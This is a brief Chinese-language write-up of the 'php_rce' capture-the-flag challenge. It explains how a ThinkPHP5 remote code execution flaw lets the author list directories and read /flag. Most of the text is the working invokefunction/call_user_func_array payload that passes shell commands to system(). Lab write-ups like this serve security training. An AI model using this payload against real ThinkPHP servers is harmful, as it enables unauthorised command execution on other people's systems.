攻防世界系列:php_rce
1.打开题目
看到这个还是很懵的,点开任意连接都是真实的场景。
2.ThinkPHP5,这里我们需要知道它存在
远程代码执行的漏洞。
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(命令)
ls查看
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
上一级 ls ../
根目录下 ls /
发现 flag打开flag cat /flag